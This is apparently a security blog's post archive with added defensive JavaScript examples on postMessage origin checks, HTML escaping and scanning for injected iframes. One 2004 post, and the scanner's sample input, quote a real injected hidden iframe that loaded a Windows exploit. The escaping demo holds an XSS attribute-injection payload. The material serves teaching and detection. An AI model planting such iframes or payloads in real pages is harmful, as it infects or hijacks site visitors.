To deal with the increasing number of compromised blogs, WordPress 2.6 will turn off XML-RPC and AtomPUB interfaces by default. MarsEdit developer Daniel Jalkut points out that the WordPress developers are ignoring the root cause: If your web service only provides one, first-class API through which all access flows, then you’ve only got one point [...]
January 20, 2008 – 2:43 pm
Maybe JavaScript needs a same-origin rule for document.location. [ via Simon Willison ]
January 11, 2007 – 9:23 pm
Via Cynthia, here’s a case of how “know your customer” laws and a bank’s indifference can derail a small business. Blue Moon Fiber Arts, a small West Coast company, runs a ‘sock club’ service: a yarn of the month club for knitters who want to work with cool, speciality yarns. The sock club grew popular. [...]
October 31, 2006 – 11:34 pm
Yesterday, Douglas Crockford made a proposal for a cross-document scripting model; however, there’s already one in the WHAT WG working draft. I’ve been reading both specifications. My notes below. Cross Document Messages In the WHAT WG model, documents can implement postMessage(). A receiving document (in another window or iframe) receives a message event, and will [...]
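The receiving side of the WHAT WG model is where the security work happens: the browser stamps each message event with the sender's origin, and the receiver has to check it before acting on the data. The following is an added example (my code, not from either specification or from Crockford's proposal) of a receiver handler that enforces an origin allow-list and parses the payload defensively, plus a sender helper that refuses the wildcard target origin. The origins, payloads and the fake window object are constructed so it runs under Node without a browser; in a page you would register `handleMessage` with `window.addEventListener('message', ...)`.

```javascript
// Added example: origin-checked postMessage receiver and a sender that always
// names its target origin. Origins and messages below are hypothetical.
'use strict';

const ALLOWED_ORIGINS = new Set(['https://app.example', 'https://widgets.example']);

// Build a handler that only dispatches messages from allowed origins.
// Returns a record of the decision so callers can see what happened.
function makeMessageHandler(allowedOrigins, dispatch) {
  return function handleMessage(event) {
    // event.origin is filled in by the browser from the sender's document
    // origin and cannot be set by the sender; it is the one field to trust.
    if (!allowedOrigins.has(event.origin)) {
      return { accepted: false, reason: 'origin not allowed: ' + event.origin };
    }
    // event.data is still untrusted input even from an allowed origin:
    // parse it, never eval() it or insert it as HTML.
    let msg;
    try {
      msg = typeof event.data === 'string' ? JSON.parse(event.data) : null;
    } catch (e) {
      return { accepted: false, reason: 'malformed JSON' };
    }
    if (!msg || typeof msg.type !== 'string') {
      return { accepted: false, reason: 'missing message type' };
    }
    dispatch(msg, event.origin);
    return { accepted: true, type: msg.type };
  };
}

// Sender side: name the target origin explicitly so the browser drops the
// message if the target window has navigated somewhere else in the meantime.
function sendMessage(targetWindow, payload, targetOrigin) {
  if (targetOrigin === '*') {
    throw new Error('refusing to post to wildcard origin');
  }
  targetWindow.postMessage(JSON.stringify(payload), targetOrigin);
}

// Demo with constructed message events.
const received = [];
const handle = makeMessageHandler(ALLOWED_ORIGINS, (msg, origin) => received.push([origin, msg.type]));

const fromAllowed = handle({ origin: 'https://app.example', data: '{"type":"resize","height":300}' });
const fromAttacker = handle({ origin: 'https://evil.example', data: '{"type":"resize","height":300}' });
const garbage = handle({ origin: 'https://app.example', data: '<script>' });

// Fake window object standing in for an iframe's contentWindow.
const fakeWindow = { posted: [], postMessage(data, origin) { this.posted.push({ data, origin }); } };
sendMessage(fakeWindow, { type: 'ping' }, 'https://widgets.example');

console.log({ fromAllowed, fromAttacker, garbage, received, posted: fakeWindow.posted });
```

The allow-list is deliberately a set of full origins (scheme, host, port), not a substring match on the hostname, because `https://app.example.attacker.example` would pass an `endsWith('app.example')` check.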
[ via Bill Bumgarner ] Given the current Federal passion for grabbing every trace of data we generate, I predict making a HDD unreadable will become a crime.
Bruce Schneier: The NSA would like to remind everyone to call their mother’s [phone] this Sunday. They need to calibrate their system.
Adam, I don’t disagree that Apple might be bragging, but do you have to use the “she was asking for it” analogy? Neither kinky boots, nor security boasts excuse assault.
October 20, 2005 – 11:12 pm
Checking on the status of a claim at my health insurer’s website, I tried signing in and got this helpful message: At least it’s one less thing I need to remember.
October 16, 2005 – 7:02 pm
Brad Fitzpatrick endorses naming patches/installers with their digest value so you can search for patch “55820ee2f8c767a2833b21bd365e5753f50bd8ce”, download the file, compute the digest, and confirm you have the right files.
October 5, 2005 – 8:29 pm
Cynthia passed along the Yarn Harlot’s airplane misadventure: a businessman seated next to her decided her knitting needles were a threat (even though Transportation Security Administration rules allow them on board.)
September 21, 2005 – 11:25 pm
Adam: It’s easier to check ID than it is to make a judgment call. The consequences illustrated by a scene from a popular film.
September 20, 2005 – 12:53 am
Chris Shiflett posted the slides from a recent talk on PHP security. He set up three security challenges (see the source files.) He showed off something I had not noticed before. In htmlentities() you can declare an encoding. Shiflett has a straightforward approach to untainting user input: $html = array(); $html['variable'] = htmlentities($_GET['variable'], ENT_QUOTES, "utf-8"); /* Code [...]
September 13, 2005 – 12:24 am
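Two things in Shiflett's one-liner carry the weight: ENT_QUOTES (so single quotes are escaped too, which the default mode does not do) and keeping the escaped values in a separate $html array that templates read from. The following is an added example, my code and not Shiflett's, that shows both in JavaScript: an escaper matching PHP's default quote handling beside one matching ENT_QUOTES, rendered into a single-quoted attribute so the difference is visible. The attacker input and the template are constructed for the demo.

```javascript
// Added example: why ENT_QUOTES matters, and the "escape at the boundary into
// a separate map" pattern. Payload and template are hypothetical.
'use strict';

// Equivalent of htmlentities() in its default (ENT_COMPAT) mode: & < > " only.
function escapeCompat(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };
  return String(s).replace(/[&<>"]/g, c => map[c]);
}

// ENT_QUOTES equivalent: the single quote is escaped as well (as &#039;, the form PHP emits).
function escapeQuotes(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Build the $html-style map: every value escaped once, at the boundary, so the
// template never has a handle on the raw query value.
function untaint(query) {
  const html = {};
  for (const [k, v] of Object.entries(query)) html[k] = escapeQuotes(v);
  return html;
}

// A template that uses single-quoted attributes, which is where the default mode fails.
function render(escaper, value) {
  return `<input type='text' name='variable' value='${escaper(value)}'>`;
}

// Constructed attacker input that closes a single-quoted attribute.
const PAYLOAD = "x' onfocus='alert(1)' autofocus='";

// Did the attacker's attribute survive into the markup as a real attribute?
function injected(markup) {
  return /onfocus='alert\(1\)'/.test(markup);
}

const compatOut = render(escapeCompat, PAYLOAD);  // onfocus=... is live
const quotesOut = render(escapeQuotes, PAYLOAD);  // value stays one string
console.log({ compatOut, quotesOut, compatInjected: injected(compatOut), quotesInjected: injected(quotesOut) });
```

The encoding argument has no direct equivalent here because JavaScript strings are already decoded; the corresponding check on a PHP page is that the charset passed to htmlentities() matches the one the page declares, since a mismatch lets a multi-byte sequence swallow the closing quote the escaper was supposed to neutralize.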
Dori Smith reminds us there’s a shiny Easter Egg in her Serenity Dashboard Widget. Chris Shiflett finished his book on PHP security for O’Reilly. I’m getting a copy and so are the rest of my team. Ryan Campbell wrote a short piece on how to degrade Ajax so your site still works with JavaScript turned [...]
An analysis of the recent DNS poisoning attacks [ via meuon ] finds that the attackers’ motivation was gaming a pay-per-click search engine. A couple of days ago, a coworker asked me if I’ve been able to apply any of my economics training in my current profession. Well, for one thing, I could have told [...]
December 7, 2004 – 12:00 am
Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page. <div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body> The hidden iFrame loads a Windows exploit. I have removed it, for the time being. I don’t know how [...]
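A validation check catching this was luck; the injected block has three properties a script can look for (1x1 dimensions, a hidden wrapper, and a src on another host). Here is an added example of such a scanner, my code and not anything from the original post, that works over raw HTML text with regular expressions so it can run from cron over a site's files without a DOM library. The sample pages are constructed for the demo; the re6.net host is the one named above, and blog.example stands in for the site's own hostname.

```javascript
// Added example: flag iframes that are tiny, wrapped in hidden markup, or point
// off-site. Sample HTML is constructed; site hostname is hypothetical.
'use strict';

const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const ATTR_RE = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

// Parse an iframe tag's attribute text into a lowercase-keyed object.
function parseAttrs(attrText) {
  const attrs = {};
  let m;
  ATTR_RE.lastIndex = 0;
  while ((m = ATTR_RE.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

function isTiny(v) {
  const n = parseInt(v, 10);
  return !Number.isNaN(n) && n <= 1;
}

// Returns one finding per suspicious iframe: { src, reasons }.
function findSuspiciousIframes(html, siteHost) {
  const findings = [];
  let m;
  IFRAME_RE.lastIndex = 0;
  while ((m = IFRAME_RE.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    const reasons = [];
    if (isTiny(attrs.width) && isTiny(attrs.height)) reasons.push('1x1');
    // Check the tag's own style plus the 200 characters before it, which is
    // where a hidden wrapper div like the one found above will sit.
    const context = (html.slice(Math.max(0, m.index - 200), m.index) + (attrs.style || '')).toLowerCase();
    if (/visibility\s*:\s*hidden|display\s*:\s*none/.test(context)) reasons.push('hidden');
    let host = null;
    try {
      host = new URL(attrs.src || '', 'http://' + siteHost).hostname;
    } catch (e) {
      reasons.push('unparseable src');
    }
    if (host && host !== siteHost) reasons.push('off-site src ' + host);
    if (reasons.length) findings.push({ src: attrs.src || '', reasons });
  }
  return findings;
}

// Constructed pages: the injected block from the post, and a legitimate same-site embed.
const INJECTED = '<p>last paragraph</p><div style="visibility: hidden; position: absolute; left: 1; top: 1">'
  + '<iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 '
  + 'marginwidth=0 marginheight=0 scrolling=no></iframe></div></body>';
const CLEAN = '<p>video</p><iframe src="/embed/clip.html" width="400" height="300"></iframe></body>';

const injectedFindings = findSuspiciousIframes(INJECTED, 'blog.example');
const cleanFindings = findSuspiciousIframes(CLEAN, 'blog.example');
console.log({ injectedFindings, cleanFindings });
```

Any one reason is enough to report; an off-site iframe that is neither tiny nor hidden may be legitimate, but on a blog that does not knowingly embed third-party frames it is still worth a look, and the three signals together are the signature of this particular injection.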